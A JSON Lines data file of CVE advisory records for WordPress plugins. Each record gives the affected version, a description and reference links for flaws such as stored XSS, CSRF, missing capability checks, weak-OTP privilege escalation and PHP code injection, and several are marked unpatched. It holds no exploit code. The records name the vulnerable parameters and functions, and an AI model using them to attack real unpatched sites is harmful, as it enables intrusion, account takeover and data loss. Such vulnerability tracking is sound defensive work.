{"CVE_ID":"CVE-2025-3814","slug":"tax-switch-for-woocommerce","versionImpact":"1.4.2","description":"The Tax Switch for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class-name\u2019 parameter in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tax-switch-for-woocommerce\\\/tags\\\/1.4.0\\\/includes\\\/class-wdevs-tax-switch-block.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tax-switch-for-woocommerce\\\/tags\\\/1.4.0\\\/includes\\\/class-wdevs-tax-switch-block.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277044\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277044\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tax-switch-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tax-switch-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e290f1aa-d20a-4e76-b77b-3e5b79e9d379?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e290f1aa-d20a-4e76-b77b-3e5b79e9d379?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7769","slug":"clicksold-wordpress-plugin","versionImpact":"1.90","description":"The ClickSold IDX WordPress plugin through 1.90 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/198252c2-834b-401b-98a5-2f59910d67bc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/198252c2-834b-401b-98a5-2f59910d67bc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4607","slug":"psw-login-and-registration","versionImpact":"1.12","description":"The PSW Front-end Login & Registration plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.12 via the customer_registration() function. This is due to the use of a weak, low-entropy OTP mechanism in the forget() function. This makes it possible for unauthenticated attackers to initiate a password reset for any user, including administrators, and elevate their privileges for full site takeover.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L731\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L731\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/psw-login-and-registration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/psw-login-and-registration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2d6e595-0682-4a41-a432-afbcb50144e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2d6e595-0682-4a41-a432-afbcb50144e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6039","slug":"processingjs-for-wp","versionImpact":"1.2.2","description":"The ProcessingJS for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pjs4wp' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/processingjs-for-wp\\\/trunk\\\/processingjs-for-wp.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/processingjs-for-wp\\\/trunk\\\/processingjs-for-wp.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcda8a7a-40e3-416e-940a-ba0245dcaa7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcda8a7a-40e3-416e-940a-ba0245dcaa7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4783","slug":"youtube-channel-gallery","versionImpact":"2.4","description":"The Youtube Channel Gallery WordPress plugin through 2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38e4c7fe-94d5-48b9-8659-e114cbbb4252\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38e4c7fe-94d5-48b9-8659-e114cbbb4252\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4941","slug":"wc-multivendor-membership","versionImpact":"2.10.0","description":"The WCFM Membership plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.10.0 due to missing nonce checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying membership details, changing renewal information, controlling membership approvals, and more, via a forged request granted they can trick a site's administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632641%40wc-multivendor-membership&new=2632641%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632641%40wc-multivendor-membership&new=2632641%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3758db41-a3c5-436a-bb9a-5886f10d1519?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3758db41-a3c5-436a-bb9a-5886f10d1519?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2605020%40wc-multivendor-membership&new=2605020%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2605020%40wc-multivendor-membership&new=2605020%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2416","slug":"meeting-scheduler-by-vcita","versionImpact":"4.2.10","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the vcita_logout_callback function in versions up to, and including, 4.2.10. This makes it possible for unauthenticated to logout a vctia connected account which would cause a denial of service on the appointment scheduler, via a forged request granted they can trick a site user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f434585c-8533-4788-b0bc-5650390c29a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f434585c-8533-4788-b0bc-5650390c29a8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35098","slug":"wordpress-nextgen-galleryview","versionImpact":"0.5.5","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in John Brien WordPress NextGen GalleryView plugin <=\u00a00.5.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-nextgen-galleryview\\\/wordpress-wordpress-nextgen-galleryview-plugin-0-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-nextgen-galleryview\\\/wordpress-wordpress-nextgen-galleryview-plugin-0-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4938","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.1.3.3. This is due to a missing capability check on the woobe_bulkoperations_apply_default_combination function. This makes it possible for authenticated attackers (subscriber or higher) to manipulate products.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L286\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c42f56a2-b9f9-40ef-86ad-fea6cf2e29f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c42f56a2-b9f9-40ef-86ad-fea6cf2e29f8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0702","slug":"oliver-pos","versionImpact":"2.4.1.8","description":"The Oliver POS \u2013 A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions hooked via AJAX in the includes\/class-pos-bridge-install.php file in all versions up to, and including, 2.4.1.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oliver-pos\\\/trunk\\\/includes\\\/class-pos-bridge-install.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oliver-pos\\\/trunk\\\/includes\\\/class-pos-bridge-install.php#L11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5640","slug":"bdthemes-prime-slider-lite","versionImpact":"3.14.7","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 attribute within the Pacific widget in all versions up to, and including, 3.14.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9820b52b-540a-47e8-9e5f-274ef1720ffa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9820b52b-540a-47e8-9e5f-274ef1720ffa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-prime-slider-lite\\\/tags\\\/3.14.7\\\/modules\\\/pacific\\\/widgets\\\/pacific.php#L1462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-prime-slider-lite\\\/tags\\\/3.14.7\\\/modules\\\/pacific\\\/widgets\\\/pacific.php#L1462\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-prime-slider-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-prime-slider-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097891\\\/#file372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097891\\\/#file372\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4604","slug":"2j-slideshow","versionImpact":"1.3.54","description":"The Slideshow, Image Slider by 2J plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018post\u2019 parameter in versions up to, and including, 1.3.54 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3a9a1f1-566f-478e-a0b7-857c12f21ff7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3a9a1f1-566f-478e-a0b7-857c12f21ff7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/2j-slideshow\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/2j-slideshow\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9630","slug":"wps-telegram-chat","versionImpact":"4.6.0","description":"The WPS Telegram Chat plugin for WordPress is vulnerable to authorization bypass due to a missing capability check when accessing messages in versions up to, and including, 4.5.4. This makes it possible for unauthenticated attackers to view the messages that are sent through the Telegram Bot API.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b9b17f-f819-4316-8565-4e7603cd5de7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b9b17f-f819-4316-8565-4e7603cd5de7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wps-telegram-chat\\\/tags\\\/4.5.4\\\/public\\\/partials\\\/wps-telegram-chat-public-handler.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wps-telegram-chat\\\/tags\\\/4.5.4\\\/public\\\/partials\\\/wps-telegram-chat-public-handler.php#L92\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11118","slug":"404-error-monitor","versionImpact":"1.1","description":"The 404 Error Monitor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the updatePluginSettings() function. This makes it possible for unauthenticated attackers to make changes to plugin settings and clear up all the error logs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ba7a54d-3497-4788-aa73-081d2c1015fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ba7a54d-3497-4788-aa73-081d2c1015fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/404-error-monitor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/404-error-monitor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404-error-monitor\\\/trunk\\\/index.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404-error-monitor\\\/trunk\\\/index.php#L274\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0939","slug":"magicform","versionImpact":"1.6.2","description":"The MagicForm plugin for WordPress is vulnerable to access and modification of data due to a missing capability check on the plugin's AJAX actions in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke those actions in order to delete or view logs, modify forms or modify plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magicform\\\/trunk\\\/admin\\\/admin-menu.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magicform\\\/trunk\\\/admin\\\/admin-menu.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa3497ae-7f3a-4e67-ad7a-77b50dccaf3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa3497ae-7f3a-4e67-ad7a-77b50dccaf3b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13679","slug":"buybox-widget","versionImpact":"3.1.5","description":"The Widget BUY.BOX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buybox-widget' shortcode in all versions up to, and including, 3.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buybox-widget\\\/trunk\\\/functions\\\/Widget\\\/Embed.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buybox-widget\\\/trunk\\\/functions\\\/Widget\\\/Embed.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fba6abba-fe29-4a94-bf20-3db78737c275?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fba6abba-fe29-4a94-bf20-3db78737c275?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13890","slug":"allow-php-execute","versionImpact":"1.0","description":"The Allow PHP Execute plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 1.0. This is due to allowing PHP code to be entered by all users for whom unfiltered HTML is allowed. This makes it possible for authenticated attackers, with Editor-level access and above, to inject PHP code into posts and pages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allow-php-execute\\\/trunk\\\/allow-php-execute.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allow-php-execute\\\/trunk\\\/allow-php-execute.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412c39e9-9378-4c2c-817c-8d37f156af6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412c39e9-9378-4c2c-817c-8d37f156af6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4595","slug":"fastspring","versionImpact":"3.0.1","description":"The FastSpring plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fastspring\/block-fastspringblocks-complete-product-catalog' block in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping on the 'color' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fastspring\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fastspring\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e96d118a-e38c-4043-9550-5f5ab0d83dc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e96d118a-e38c-4043-9550-5f5ab0d83dc7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5956","slug":"hrm","versionImpact":"2.2.17","description":"The WP Human Resource Management plugin for WordPress is vulnerable to Arbitrary User Deletion due to a missing authorization within the ajax_delete_employee() function in versions 2.0.0 through 2.2.17. The plugin\u2019s deletion handler reads the client-supplied $_POST['delete'] array and passes each ID directly to wp_delete_user() without verifying that the caller has the delete_users capability or limiting which user IDs may be removed. This makes it possible for authenticated attackers, with Employee-level access and above, to delete arbitrary accounts, including administrators.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hrm\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hrm\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28cf0f3f-0048-4da9-aa86-243479f7b974?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28cf0f3f-0048-4da9-aa86-243479f7b974?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8317","slug":"custom-word-cloud","versionImpact":"0.3","description":"The Custom Word Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018angle\u2019 parameter in all versions up to, and including, 0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/custom-word-cloud\\\/trunk\\\/custom-word-cloud.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/custom-word-cloud\\\/trunk\\\/custom-word-cloud.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-word-cloud\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-word-cloud\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f153a0ce-c967-43ed-97be-901ea7dcd12b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f153a0ce-c967-43ed-97be-901ea7dcd12b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4940","slug":"wc-multivendor-membership","versionImpact":"2.10.0","description":"The WCFM Membership plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 2.10.0 due to missing capability checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying membership details, changing renewal information, controlling membership approvals, and more.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632641%40wc-multivendor-membership&new=2632641%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632641%40wc-multivendor-membership&new=2632641%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2605020%40wc-multivendor-membership&new=2605020%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2605020%40wc-multivendor-membership&new=2605020%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c6577a2-6722-4d3b-958d-1143dca414cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c6577a2-6722-4d3b-958d-1143dca414cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
